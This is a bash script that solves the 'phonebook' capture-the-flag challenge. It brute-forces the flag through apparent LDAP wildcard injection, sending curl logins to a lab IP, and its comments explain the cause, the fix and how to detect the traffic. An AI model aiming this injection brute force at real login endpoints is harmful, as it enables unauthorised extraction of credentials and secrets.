curl brute flag
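#!/bin/bash
# Recovers the flag of the "phonebook" challenge one character at a time.
# The flag alphabet is lowercase letters, digits and underscore; '}' closes it.
#
# Why the probe works (defender's view): the login endpoint stops answering
# "failed" when the submitted password is a correct prefix followed by '*',
# so the value is being matched as a pattern instead of compared literally.
# NOTE(review): presumably the password reaches a directory/LDAP-style filter
# unescaped -- confirm against the challenge source. The server-side fix is to
# escape filter metacharacters before building the query and to compare
# credentials literally. This traffic is easy to spot: a long run of failed
# logins for one account whose passwords share a growing prefix and end in
# '*'. Failed-login rate limiting or lockout would also slow it down.

readonly url='http://209.97.179.123:31420/login'
readonly user='reese'

# Known flag prefix; extended by one character per outer iteration.
flag='HTB{'

# Stop once the closing brace has been recovered. The original looped forever:
# its candidate list ended in an empty string, which always "matched".
while [[ "$flag" != *'}' ]]; do
  matched=0

  for ch in {a..z} _ {0..9} '}'; do
    # Response headers only (-D - -o /dev/null); the trailing '*' is required
    # by the wildcard behaviour described above.
    if ! response=$(curl -s -D - -o /dev/null "$url" \
      --data "username=${user}&password=${flag}${ch}*"); then
      # A transport error yields an empty response, which the "failed" check
      # below would otherwise misread as a correct guess.
      printf '\ncurl failed; stopping at %s\n' "$flag" >&2
      exit 1
    fi

    if [[ -n "$response" && "$response" != *"failed"* ]]; then
      flag+=$ch
      matched=1
      # Fixed format string: never pass variable data as the printf format.
      printf '%s\r' "$flag"
      break
    fi

    # Progress display: current prefix plus the candidate just rejected.
    printf '%s\r' "$flag$ch"
  done

  if [[ "$matched" -eq 0 ]]; then
    # No candidate extended the prefix: the alphabet assumption is wrong or
    # the endpoint changed. Stop instead of spinning.
    printf '\nno candidate matched after %s\n' "$flag" >&2
    exit 1
  fi
done

printf '%s\n' "$flag"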